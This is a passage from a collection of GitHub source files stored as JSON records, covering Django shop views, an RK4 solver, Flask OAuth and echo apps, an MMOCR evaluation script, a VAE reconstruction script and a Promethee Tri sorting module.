cur_recip_rank = cur_recip_rank.astype('U13').tolist()\n space_sep_rank = ' '.join(cur_recip_rank)\n user_id = user_id_list[test_loader.cur_dic[\"user_id_idx\"]]\n session_id = session_id_list[test_loader.cur_dic[\"session_id_idx\"]]\n timestamp = test_loader.cur_dic[\"timestamp\"]\n step = test_loader.cur_dic[\"step\"]\n click = impressions[test_loader.cur_dic[\"click\"]] if test_loader.cur_dic[\"click\"] != -1 else -1\n pick = cur_recip_rank.index(click) + 1 if click != -1 else -1\n 
#submission.write(user_id, session_id, timestamp, step, space_sep_rank)\n submission.write_is_val(user_id, session_id, timestamp, step, space_sep_rank, click, pick)\n \n if (i %1000 == 0):\n print(i+1 , '/', test_loader.impression_dic_size, 'Done')\n\n submission.close()\n","repo_name":"solapark/fm","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"835155368","text":"import json\nfrom datetime import datetime, timedelta\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages.storage import session\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.utils.translation import gettext\n\nfrom customer.models import Customer\nfrom order.models import Order, OrderItem, ShippingAddress\nfrom store.models import Product, Discount\n\n\n# this is a function that just return cart of customer that logged in.\ndef cart(request):\n return render(request, 'order/cart.html')\n\n\n# this is a function for update order & orderItem of customer\n@login_required\ndef updateItem(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n product_id = data['productId']\n quantity = data['quantity']\n customer = Customer.objects.get(user=request.user)\n product = Product.objects.get(id=product_id)\n try:\n order = Order.objects.get(customer=customer, complete=False)\n except Order.DoesNotExist:\n order = Order(customer=customer, complete=False)\n order.save()\n\n try:\n order_item = OrderItem.objects.get(order=order, product=product)\n except OrderItem.DoesNotExist:\n order_item = OrderItem(order=order, product=product)\n\n order_item.quantity = quantity\n\n order_item.save()\n\n if order_item.quantity <= 0:\n order_item.delete()\n\n return JsonResponse('Item was added', safe=False)\n\n\n# this is for checkout the order for customer and complete the order\n@login_required\ndef checkout(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n address_id = data['address_id']\n discount_code = data['discount']\n customer = Customer.objects.get(user=request.user)\n order = Order.objects.get(customer=customer, complete=False)\n user_address = ShippingAddress.objects.get(id=address_id)\n order.shipping_address = user_address\n order.complete = True\n order.save()\n user_order_items = order.orderItems.all()\n for orderItem in user_order_items:\n product = orderItem.product\n product.stock -= orderItem.quantity\n product.save()\n if discount_code != '':\n customer.discount_code = None\n customer.save()\n return JsonResponse('True', safe=False)\n customer = Customer.objects.get(user=request.user)\n addresses = ShippingAddress.objects.filter(customer=customer)\n return render(request, 'order/checkout.html', context={'addresses': addresses})\n\n\n# this function return history of orders for 10 days ago\n# orders must be completed.\n@login_required\ndef orderHistory(request):\n login_user = request.user\n customer = Customer.objects.get(user=login_user)\n t = timedelta(days=10)\n ten_days_ago = datetime.now() - t\n available_orders = Order.objects.filter(customer=customer, date_ordered__range=[ten_days_ago, datetime.now()],\n complete=True)\n return render(request, 'order/order_history.html', context={\n 'available_orders': available_orders\n })\n\n\n@login_required\ndef checkDiscount(request, code):\n customer = 
Customer.objects.get(user=request.user)\n    try:\n        discount = Discount.objects.get(code=code)\n        if customer.discount_code != discount:\n            return JsonResponse({'error': gettext('Wrong code !!!')})\n        if not discount.state:\n            return JsonResponse({'error': gettext('This code has been expired !!!')})\n        else:\n            return JsonResponse({'amount': discount.amount})\n    except:\n        return JsonResponse({'error': gettext('Wrong code !!!')})\n","repo_name":"abolfazlj00/Ecommerce_djangoProject","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"24586456511","text":"class RK4(object):\n    def __init__(self, *functions):\n        self.f = functions\n        self.t = 0\n\n    def solve(self, y, h, n):\n        t = []\n        res = []\n        for i in y:\n            res.append([])\n\n        while self.t <= n and h != 0:\n            t.append(self.t)\n            y = self._solve(y, self.t, h)\n            for c, i in enumerate(y):\n                res[c].append(i)\n\n            self.t += h\n\n            if self.t + h > n:\n                h = n - self.t\n\n        return t, res\n\n\n    def _solve(self, y, t, h):\n        k1 = []\n        k2 = []\n        k3 = []\n        k4 = []\n        for f in self.f:\n            k1.append(h * f(t, *y))\n            k2.append(h * f(t + .5*h, *[y[i] + .5*h*k1[i] for i in range(0, len(y))]))\n            k3.append(h * f(t + .5*h, *[y[i] + .5*h*k2[i] for i in range(0, len(y))]))\n            k4.append(h * f(t + h, *[y[i] + h*k3[i] for i in range(0, len(y))]))\n\n        return [y[i] + (k1[i] + 2*k2[i] + 2*k3[i] + k4[i]) / 6.0 for i in range(0, len(y))]","repo_name":"catbrower/network_project","sub_path":"RungeKutta.py","file_name":"RungeKutta.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"9891201705","text":"# coding: utf-8\n\"\"\"\nAdd object_name column to object_publications table.\n\"\"\"\n\nimport os\n\nimport flask_sqlalchemy\n\nfrom .utils import table_has_column\n\nMIGRATION_INDEX = 27\nMIGRATION_NAME, _ = os.path.splitext(os.path.basename(__file__))\n\n\ndef run(db: flask_sqlalchemy.SQLAlchemy) -> bool:\n    # Skip migration by condition\n    if table_has_column('object_publications', 'object_name'):\n        return False\n\n    # Perform migration\n    db.session.execute(db.text(\"\"\"\n        ALTER TABLE object_publications\n        ADD object_name TEXT NULL\n    \"\"\"))\n    return True\n","repo_name":"sciapp/sampledb","sub_path":"sampledb/models/migrations/publications_add_object_name.py","file_name":"publications_add_object_name.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"}
{"seq_id":"21844410450","text":"import urllib.request, urllib.parse, urllib.error\nimport xml.etree.ElementTree as ET\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ncount = 0\nlista = list()\n\nurl = input('Enter -')\nuh = urllib.request.urlopen(url, context=ctx)\n\ndata = uh.read()\ntree = ET.fromstring(data)\n\ntags = tree.findall('comments/comment')\n#print(\"count\",len(tree.findall('comments/comment')))\nfor elem in tags:\n    tag = elem.find('count').text\n    #print(\"tag:\",tag)\n\n    nums = int(tag)\n    #lista.append(nums)\n    count += nums\n    \nprint(\"This is the result:\",count)\n\n\n\n#results = tree.findall('result')\n#contar = tree.find('count').text\n#print(\"contar\",contar)\n#lng = results[0].find('geometry').find('location').find('lng').text\n#location = 
results[0].find('formatted_address').text\n\n#print('contar', contar)\n#print(location)","repo_name":"Cande8a/Python","sub_path":"ej tarea XML.py","file_name":"ej tarea XML.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"74118221023","text":"from flask import Flask, request\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef echo():\n    return (\n        f'METHOD: <br>{request.method}<br><br>'\n        f'HEADERS: <br>{request.headers}<br><br>'\n        f'BODY: <br>{request.data.decode()}<br><br>'\n    )\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n","repo_name":"jli488/Notes-Expert-Python","sub_path":"Chapter-02/app/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"42182185033","text":"import json\nfrom flask import Flask, request, redirect\nimport multiprocessing\nfrom threading import Timer\n\nimport twitter\nfrom twitter.oauth_dance import parse_oauth_tokens\nfrom twitter.oauth import read_token_file, write_token_file\n\n\n# XXX: Go to http://twitter.com/apps/new to create an app and get values\n# for these credentials that you'll need to provide in place of these\n# empty string values that are defined as placeholders.\n# See https://dev.twitter.com/docs/auth/oauth for more information \n# on Twitter's OAuth implementation, and ensure that *oauth_callback*\n# is defined in your application settings as shown next if you are \n# using Flask in this IPython Notebook.\n\n# Define a few variables that will bleed into the lexical scope of a couple of \n# functions that follow\n# CONSUMER_KEY = ''\n# CONSUMER_SECRET = ''\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n\n# CAUTION: These files contain secrets that can grant access to anyone that can read them.\n# Better way to manage passwords/Keys?!?!? TODO\nOAUTH_FILE = \"resources/ch09-twittercookbook/twitter_oauth\"\nconfig.read_file(open(r'./../twitter_keys'))\n\n\nCONSUMER_KEY = config.get('T Section', 'CONSUMER_KEY')\nCONSUMER_SECRET = config.get('T Section', 'CONSUMER_SECRET')\n\n\noauth_callback = 'http://127.0.0.1:5000/oauth_helper'\n \n# Set up a callback handler for when Twitter redirects back to us after the user \n# authorizes the app\n\nwebserver = Flask(\"TwitterOAuth\")\n@webserver.route(\"/oauth_helper\")\ndef oauth_helper():\n    \n    oauth_verifier = request.args.get('oauth_verifier')\n\n    # Pick back up credentials from ipynb_oauth_dance\n    oauth_token, oauth_token_secret = read_token_file(OAUTH_FILE)\n    \n    _twitter = twitter.Twitter(\n        auth=twitter.OAuth(\n            oauth_token, oauth_token_secret, CONSUMER_KEY, CONSUMER_SECRET),\n        format='', api_version=None)\n    \n    oauth_token, oauth_token_secret = parse_oauth_tokens(\n        _twitter.oauth.access_token(oauth_verifier=oauth_verifier, oauth_token=oauth_token, oauth_consumer_key=CONSUMER_KEY))\n\n    # Write out the final credentials that can be picked up after the following\n    write_token_file(OAUTH_FILE, oauth_token, oauth_token_secret)\n    return \"%s %s written to %s\" % (oauth_token, oauth_token_secret, OAUTH_FILE)\n\n# To handle Twitter's OAuth 1.0a implementation, we'll just need to implement a \n# custom \"oauth dance\" and will closely follow the pattern defined in \n# twitter.oauth_dance.\n\n@webserver.route(\"/oauth_dance\")\ndef oauth_dance():\n    \n    _twitter = twitter.Twitter(\n        auth=twitter.OAuth('', '', CONSUMER_KEY, CONSUMER_SECRET),\n        format='', api_version=None)\n\n    oauth_token, oauth_token_secret = parse_oauth_tokens(\n        _twitter.oauth.request_token(oauth_callback=oauth_callback))\n\n    print(oauth_token, oauth_token_secret, \"token and secret from twitter\")\n    # Need to write these interim values out to a file to pick up on the callback \n    # from Twitter that is handled by the web server in /oauth_helper\n    write_token_file(OAUTH_FILE, oauth_token, oauth_token_secret)\n    \n    oauth_url = ('https://api.twitter.com/oauth/authorize?oauth_token=' + oauth_token)\n    \n    # Redirect to twitter URL for user authorization.\n    return 
redirect(oauth_url, code=302)\n\n\n@webserver.route(\"/trends//\")\ndef trends(woe_id):\n \n oauth_token, oauth_token_secret = read_token_file(OAUTH_FILE)\n \n auth = twitter.oauth.OAuth(oauth_token, oauth_token_secret,\n CONSUMER_KEY, CONSUMER_SECRET)\n \n twitter_api = twitter.Twitter(auth=auth)\n \n trends = twitter_api.trends.place(_id=woe_id)\n# print(json.dumps(trends, indent=1))\n\n return json.dumps(trends, indent=1)\n\n\n\nwebserver.run(host='0.0.0.0')\n\n","repo_name":"dteklavya/Mining-the-Social-Web-2nd-Edition","sub_path":"ipynb/twitter_oauth.py","file_name":"twitter_oauth.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13160751505","text":"# -*- coding: utf-8 -*-\n\nimport optimisation_class_no_plots_128 as optim\nimport inv_prob_class as IP\nimport knees2_128_128_vae_test as vae\nimport tensorflow as tf\nimport numpy as np\ntest_images = np.load('./datasets/knee_fastMRI_test_128_cleaned.npy')\n\n\ntf.reset_default_graph()\nsess = tf.InteractiveSession()\n\n# Import the VAE model and load from a checkpoint\ncheckpoint_file = 'USER DEFINED PATH'\nmodel = vae.kneesVAE(800, checkpoint_file, sess)\n\n# Set up the inverse problem\ninv_prob = IP.invProb(model, 'tomography')\naim = test_images[253]\n\n# Create noisy observed data\nnp.random.seed(9)\ninv_prob.observe_data(aim, noise_level=0.02)\nnp.save('aim_knees_test_cleaned_253.npy', inv_prob.aim)\nnp.save('data_knees_tomography_test_cleaned_253_0.02_noise.npy', inv_prob.data)\n\n\n#Load the optimisation class \nopt = optim.optimisation(inv_prob, model)\n\n#Test the 4 different optimisation methods \nplot = opt.gd_z_regularisation_parameter(initial_z=np.random.normal(\n 0, 1, (4, opt.n_latent)), iteration_number=200, save_name='VAE2_128_128_800_0.001_z_optimisation_knees_test_cleaned_253_no_sig', save=True)\nplot = opt.optim_z_sparse_regularisation_parameter(initial_z=np.random.normal(0, 1, (4, opt.n_latent)), initial_u=np.zeros(\n (4, 128, 128)), iteration_number=200, save_name='VAE2_128_128_800_0.001_z_sparse_knees_test_cleaned_253_no_sig_', early_stop=False, save=True)\nplot = opt.optim_x_soft_constraints_regularisation_parameter(initial_z=np.random.normal(0, 1, (4, opt.n_latent)), initial_x=np.random.normal(\n 0, 1, (4, 128, 128)), iteration_number=200, save_name='VAE2_128_128_800_0.001_x_soft_knees_test_cleaned_253_no_sig_', early_stop=False, save=True)\nplot = opt.optim_x_tik_regularisation_parameter(\n iteration_number=3000, save_name='x_tik_knees_test_cleaned_253_no_sig', save=True, early_stop=False)\n\n#\n#\n","repo_name":"MargaretDuff/Regularising-Inverse-Problems-with-Generative-Machine-Learning-Models","sub_path":"knees/run_reconstructions.py","file_name":"run_reconstructions.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1580774945","text":"import argparse\nimport os\nimport warnings\n\nimport mmcv\nimport torch\nfrom mmcv import Config, DictAction\nfrom mmcv.cnn import fuse_conv_bn\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmcv.runner import (get_dist_info, init_dist, load_checkpoint,\n wrap_fp16_model)\nfrom mmdet.apis import multi_gpu_test\n\nfrom mmocr.apis.test import single_gpu_test\nfrom mmocr.apis.utils import (disable_text_recog_aug_test,\n replace_image_to_tensor)\nfrom mmocr.datasets import build_dataloader, build_dataset\nfrom mmocr.models import 
build_detector\nfrom mmocr.utils import revert_sync_batchnorm, setup_multi_processes\n\n\ndef parse_args():\n # 已看過,驗證模式下的參數配置\n parser = argparse.ArgumentParser(\n description='MMOCR test (and eval) a model.')\n # 選取config文件\n parser.add_argument('config', help='Test config file path.')\n # 設定訓練完成的模型權重檔案位置\n parser.add_argument('checkpoint', help='Checkpoint file.')\n # 輸出結果的檔案位置,需要是pickle格式\n parser.add_argument('--out', help='Output result file in pickle format.')\n # 是否需要將conv與bn進行融合,透過融合可以加速模型訓練,因為權重不會再改變所以可以透過數學將兩層合併為一層\n parser.add_argument(\n '--fuse-conv-bn',\n action='store_true',\n help='Whether to fuse conv and bn, this will slightly increase'\n 'the inference speed.')\n # 要使用的gpu的id\n parser.add_argument(\n '--gpu-id',\n type=int,\n default=0,\n help='id of gpu to use '\n '(only applicable to non-distributed testing)')\n # 是否需要將輸出資料格式化\n parser.add_argument(\n '--format-only',\n action='store_true',\n help='Format the output results without performing evaluation. It is'\n 'useful when you want to format the results to a specific format and '\n 'submit them to the test server.')\n # 驗證指標,如果是文字區域檢測可以使用hmean-iou\n parser.add_argument(\n '--eval',\n type=str,\n nargs='+',\n help='The evaluation metrics. Options: \\'hmean-ic13\\', \\'hmean-iou'\n '\\' for text detection tasks, \\'acc\\' for text recognition tasks, and '\n '\\'macro-f1\\' for key information extraction tasks.')\n # 是否需要展示預測結果\n parser.add_argument('--show', action='store_true', help='Show results.')\n # 將預測結果保存在哪裡\n parser.add_argument(\n '--show-dir', help='Directory where the output images will be saved.')\n # 閾值,當預測值小於閾值的會被忽略掉,預設為0.3\n parser.add_argument(\n '--show-score-thr',\n type=float,\n default=0.3,\n help='Score threshold (default: 0.3).')\n # 是否要使用gpu收集results\n parser.add_argument(\n '--gpu-collect',\n action='store_true',\n help='Whether to use gpu to collect results.')\n # 暫存檔案位置,用來搜集從多線程預測出的結果\n parser.add_argument(\n '--tmpdir',\n help='The tmp directory used for collecting results from multiple '\n 'workers, available when gpu-collect is not specified.')\n # 其他額外添加的config\n parser.add_argument(\n '--cfg-options',\n nargs='+',\n action=DictAction,\n help='Override some settings in the used config, the key-value pair '\n 'in xxx=yyy format will be merged into the config file. If the value '\n 'to be overwritten is a list, it should be of the form of either '\n 'key=\"[a,b]\" or key=a,b. The argument also allows nested list/tuple '\n 'values, e.g. key=\"[(a,b),(c,d)]\". 
Note that the quotation marks '\n 'are necessary and that no white space is allowed.')\n parser.add_argument(\n '--options',\n nargs='+',\n action=DictAction,\n help='Custom options for evaluation, the key-value pair in xxx=yyy '\n 'format will be kwargs for dataset.evaluate() function (deprecate), '\n 'change to --eval-options instead.')\n parser.add_argument(\n '--eval-options',\n nargs='+',\n action=DictAction,\n help='Custom options for evaluation, the key-value pair in xxx=yyy '\n 'format will be kwargs for dataset.evaluate() function.')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='Options for job launcher.')\n # 多gpu相關資料\n parser.add_argument('--local_rank', type=int, default=0)\n args = parser.parse_args()\n if 'LOCAL_RANK' not in os.environ:\n os.environ['LOCAL_RANK'] = str(args.local_rank)\n\n if args.options and args.eval_options:\n raise ValueError(\n '--options and --eval-options cannot be both '\n 'specified, --options is deprecated in favor of --eval-options.')\n if args.options:\n warnings.warn('--options is deprecated in favor of --eval-options.')\n args.eval_options = args.options\n # 將args資料回傳\n return args\n\n\ndef main():\n # 已看過,獲取設定資料\n args = parse_args()\n\n # 以下幾種驗證內容至少需要選擇一個否則驗證是沒有作用的\n assert (\n args.out or args.eval or args.format_only or args.show\n or args.show_dir), (\n 'Please specify at least one operation (save/eval/format/show the '\n 'results / save the results) with the argument \"--out\", \"--eval\"'\n ', \"--format-only\", \"--show\" or \"--show-dir\".')\n\n if args.eval and args.format_only:\n # eval與format_only只能兩個選一個使用\n raise ValueError('--eval and --format_only cannot be both specified.')\n\n if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):\n # 如果有設定out參數則out檔案需要是以pkl或是pickle為副檔名\n raise ValueError('The output file must be a pkl file.')\n\n # 讀取config文件當中內容\n cfg = Config.fromfile(args.config)\n if args.cfg_options is not None:\n # 如果有需要特別添加額外config內容就會在這裡進行加入\n cfg.merge_from_dict(args.cfg_options)\n # 設定多線程驗證的內容\n setup_multi_processes(cfg)\n\n # set cudnn_benchmark,開啟後可以增加模型推理速度\n if cfg.get('cudnn_benchmark', False):\n torch.backends.cudnn.benchmark = True\n # 如果在config文件當中backbone有需要載入預訓練權重會先進行關閉,因為會載入整個模型的權重\n if cfg.model.get('pretrained'):\n cfg.model.pretrained = None\n # 處理neck模塊的預訓練權重,將其設定成None\n if cfg.model.get('neck'):\n if isinstance(cfg.model.neck, list):\n for neck_cfg in cfg.model.neck:\n if neck_cfg.get('rfp_backbone'):\n if neck_cfg.rfp_backbone.get('pretrained'):\n neck_cfg.rfp_backbone.pretrained = None\n elif cfg.model.neck.get('rfp_backbone'):\n if cfg.model.neck.rfp_backbone.get('pretrained'):\n cfg.model.neck.rfp_backbone.pretrained = None\n\n # in case the test dataset is concatenated,獲取一個gpu的batch_size\n samples_per_gpu = (cfg.data.get('test_dataloader', {})).get(\n 'samples_per_gpu', cfg.data.get('samples_per_gpu', 1))\n if samples_per_gpu > 1:\n # 多gpu相關設定\n cfg = disable_text_recog_aug_test(cfg)\n cfg = replace_image_to_tensor(cfg)\n\n # init distributed env first, since logger depends on the dist info.\n if args.launcher == 'none':\n cfg.gpu_ids = [args.gpu_id]\n distributed = False\n else:\n distributed = True\n init_dist(args.launcher, **cfg.dist_params)\n\n # build the dataloader\n # 構建驗證使用的dataset\n dataset = build_dataset(cfg.data.test, dict(test_mode=True))\n # step 1: give default values and override (if exist) from cfg.data\n # 構建基本DataLoader配置參數\n default_loader_cfg = {\n # 設定種子碼以及是否將最後部分去除以及分布式訓練資訊\n 
**dict(seed=cfg.get('seed'), drop_last=False, dist=distributed),\n **({} if torch.__version__ != 'parrots' else dict(\n prefetch_num=2,\n pin_memory=False,\n ))\n }\n # 其他config參數載入進去\n default_loader_cfg.update({\n k: v\n for k, v in cfg.data.items() if k not in [\n 'train', 'val', 'test', 'train_dataloader', 'val_dataloader',\n 'test_dataloader'\n ]\n })\n # 最終創建DataLoader參數\n test_loader_cfg = {\n **default_loader_cfg,\n **dict(shuffle=False, drop_last=False),\n **cfg.data.get('test_dataloader', {}),\n **dict(samples_per_gpu=samples_per_gpu)\n }\n\n # 構建DataLoader\n data_loader = build_dataloader(dataset, **test_loader_cfg)\n\n # build the model and load checkpoint\n cfg.model.train_cfg = None\n # 構建模型實例對象\n model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))\n # 將模型當中所有的syncBN轉成BN\n model = revert_sync_batchnorm(model)\n fp16_cfg = cfg.get('fp16', None)\n if fp16_cfg is not None:\n wrap_fp16_model(model)\n # 載入訓練好的模型權重\n load_checkpoint(model, args.checkpoint, map_location='cpu')\n if args.fuse_conv_bn:\n model = fuse_conv_bn(model)\n\n if not distributed:\n # 如果不是使用分布式驗證就會到這裡\n model = MMDataParallel(model, device_ids=cfg.gpu_ids)\n is_kie = cfg.model.type in ['SDMGR']\n # 進行單gpu或是cup的驗證\n outputs = single_gpu_test(model, data_loader, args.show, args.show_dir,\n is_kie, args.show_score_thr)\n else:\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False)\n outputs = multi_gpu_test(model, data_loader, args.tmpdir,\n args.gpu_collect)\n\n rank, _ = get_dist_info()\n if rank == 0:\n if args.out:\n print(f'\\nwriting results to {args.out}')\n mmcv.dump(outputs, args.out)\n kwargs = {} if args.eval_options is None else args.eval_options\n if args.format_only:\n dataset.format_results(outputs, **kwargs)\n if args.eval:\n eval_kwargs = cfg.get('evaluation', {}).copy()\n # hard-code way to remove EvalHook args\n for key in [\n 'interval', 'tmpdir', 'start', 'gpu_collect', 'save_best',\n 'rule'\n ]:\n eval_kwargs.pop(key, None)\n eval_kwargs.update(dict(metric=args.eval, **kwargs))\n print(dataset.evaluate(outputs, **eval_kwargs))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chris901003/DeepLearning","sub_path":"mmocr/tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"22036016403","text":"\"\"\" This module provides basic management of models of the NLP engine \"\"\"\n\nfrom pathlib import Path\n\nimport spacy\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\n\nfrom .classifiers import IntentClassifier\n\n\nclass ModelManager(object):\n \"\"\"Manipulate the NLP engine and models\"\"\"\n def __init__(self, model_path, create_on_404=False, default_model=\"en_core_web_sm\"):\n \"\"\"\n Initialzes the model\n Parameters:\n model_path (str): the path to the model\n --optional\n create_on_404 (bool): wether to create a new model in case the model wasn't found. Default is False\n default_model (str): the default model to use in case a new model is created. Default is 'en_core_web-sm'. 
Refer to spacy models for this\n If the model was not found and create_on_404 is False, it will raise a ModuleNotFoundError.\n If the default_model is overwritten, a possible exception in case the model wan't found by spacy is not handled.\n \"\"\"\n self.model_path = model_path\n # add the IntentClassifier to language factories\n Language.factories['intent_classifier'] = lambda model, **cfg: IntentClassifier(model, **cfg)\n \n if self.__model_exists ():\n self.model = spacy.load(self.model_path)\n else:\n if create_on_404: \n self.model = spacy.load(default_model)\n else:\n raise ModuleNotFoundError(\"The NLP model not found!\")\n # add the intent attribute to the doc\n Doc.set_extension(\"intent\", default=None, force=True)\n # add the intent classifier to the pipeline if not present\n if \"intent_classifier\" not in self.model.pipe_names:\n self.model.add_pipe(IntentClassifier)\n\n def __model_exists(self, dir_name=None):\n \"\"\"\n check if the directory name exists then return the result\n by defaults check for the actual model. \n Parameters:\n dir_name (str): path to the model to check. Its optional and default is None\n Returns bool\n \"\"\"\n if dir_name != None: \n path = Path(dir_name)\n else:\n path = Path(self.model_path)\n if path.exists():\n return True\n else:\n return False\n\n def save_model(self):\n \"\"\"Save the model\"\"\"\n self.model.to_disk (self.model_path)\n","repo_name":"emileKing/nova-bot","sub_path":"nova/managers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35586415264","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\n\n\"\"\"\n[[0,0], -> [1, 0, 0] 기타\n [1,0], -> [0, 1, 0] 포유류\n [1,1], -> [0, 0, 1] 조류\n [0,0], -> [1, 0, 0] 기타\n [0,0], -> [1, 0, 0] 기타\n [0,1] -> [0, 0, 1] 조류\n\"\"\"\n\nclass Mammal:\n @staticmethod\n def execute():\n # [털, 날개] -> 기타, 포유류, 조류\n x_data = np.array(\n [[0, 0],\n [1, 0],\n [1, 1],\n [0, 0],\n [0, 0],\n [0, 1]\n ]\n )\n y_data = np.array(\n [[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 0],\n [1, 0, 0],\n [0, 0, 1]\n ]\n )\n\n X = tf.placeholder(tf.float32)\n Y = tf.placeholder(tf.float32)\n W = tf.Variable(tf.random_uniform([2, 3], -1, 1.))\n # -1 all\n # nn은 2차원으로 [입력층(특성), 출력층(레이블)] -> [2,3]\n # tf에는 변수타입 3개. placeholder는 쓰지않게 되었으나 1년은 사용될듯.\n # tf.placeholder 는 개발자가 지정해주는 값. tf.Variable는 tf내부에서 주는값.\n # W 는 내부에서 계속 바뀌는 값. X값은 리스트로 있고 내부에 투입되면 상수처럼 처리됨.\n # 내부에서는 W가 변수처럼 계속 바뀜\n # nn은 W의 수식안에 있는 tf 안에 존재 (tf내부값)\n\n b = tf.Variable(tf.zeros([3]))\n # b는 편향 bias\n # b는 각 레이어의 아웃풋 갯수로 결정함\n\n L = tf.add(tf.matmul(X, W), b) # X와 W의 곱을 b와 합산\n L = tf.nn.relu(L) # activation 함수인 relu추가\n model = tf.nn.softmax(L)\n \"\"\"\n softmax 함수는 다음 처럼 결과값을 전체 합이 1인 확률로 만들어주는 함수 (scaling)\n 예) [8.04, 2.76, -6.52] -> [0.53, 0.24, 0.23] \n \"\"\"\n print(f'모델 내부 보기 {model}')\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(model), axis=1))\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01) # 경사하강법. 
미분으로 기울기가 0이 되는 순간을 잡아내는 것\n train_op = optimizer.minimize(cost)\n #비용함수를 최소화시키면 (= 경사도를 0으로 만들면) 그 값이 최적화 된다\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n for step in range(100):\n sess.run(train_op, {X: x_data, Y: y_data})\n if (step + 1) % 10 == 0:\n print(step +1, sess.run(cost, {X: x_data, Y: y_data}))\n\n # 결과 확인\n prediction = tf.argmax(model, 1)\n target = tf.argmax(Y, 1)\n print(f' 예측값 {sess.run(prediction, {X: x_data})}')\n print(f' 실제값 {target, { Y: y_data}}')\n is_correct = tf.equal(prediction, target)\n accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n print(f' 정확도: %.2f' % sess.run(accuracy * 100, {X: x_data, Y: y_data}))\n\nif __name__ == '__main__':\n Mammal.execute()\n # static으로 걸어두었으므로 생성자 없이 직접실행 가능","repo_name":"smile2019kr/TF_2020","sub_path":"ai/mammal.py","file_name":"mammal.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19279769772","text":"\"\"\"\n This module computes the assignments of given alternatives to categories\n using Promethee Tri method.\n\n Implementation and naming of conventions are taken from\n :cite:p:'FigueiraDeSmetBrans2004' and :cite:p:'ArazOzkarahan2007'.\n\"\"\"\n\nimport pandas as pd\nfrom typing import List, Tuple\nfrom core.promethee_flow import compute_single_criterion_net_flows\nfrom core.input_validation import promethee_tri_validation\n\n__all__ = [\"calculate_prometheetri_sorted_alternatives\"]\n\n\ndef _calculate_criteria_net_flows(\n alternatives_partial_preferences: Tuple[pd.DataFrame, pd.DataFrame],\n profiles_partial_preferences: pd.DataFrame) -> \\\n Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n This function calculates criteria net flows for profiles and alternatives.\n\n :param alternatives_partial_preferences: Tuple with pd.DataFrame with\n alternatives names as index and profiles names as columns and pd.DataFrame\n objects with profiles names as index and alternatives names as columns\n :param profiles_partial_preferences: pd.DataFrame with profiles names as\n index and profiles names as columns\n\n :return: Tuple with pd.DataFrame with profiles names as index and criteria\n names as columns and pd.DataFrame objects with alternatives names as index\n and criteria names as columns\n \"\"\"\n profiles_criteria_net_flows = compute_single_criterion_net_flows(\n profiles_partial_preferences)\n\n alternatives_criteria_net_flows = compute_single_criterion_net_flows(\n alternatives_partial_preferences)\n\n return profiles_criteria_net_flows, alternatives_criteria_net_flows\n\n\ndef _calculate_deviations(alternatives: List[str],\n criteria_weights: pd.Series,\n profiles_criteria_net_flows: pd.DataFrame,\n alternatives_criteria_net_flows: pd.DataFrame,\n use_marginal_value: bool = True) -> pd.DataFrame:\n \"\"\"\n This function calculates deviation for each alternative and each profile.\n\n :param alternatives: List with alternatives names as strings\n :param criteria_weights: Series with weights of each criterion\n :param profiles_criteria_net_flows: pd.DataFrame with profiles names as\n index and criteria names as columns\n :param alternatives_criteria_net_flows: pd.DataFrame with alternatives\n names as index and criteria names as columns\n :param use_marginal_value: Boolean which describe whether deviation\n should be calculated as absolute value or not\n\n :return: 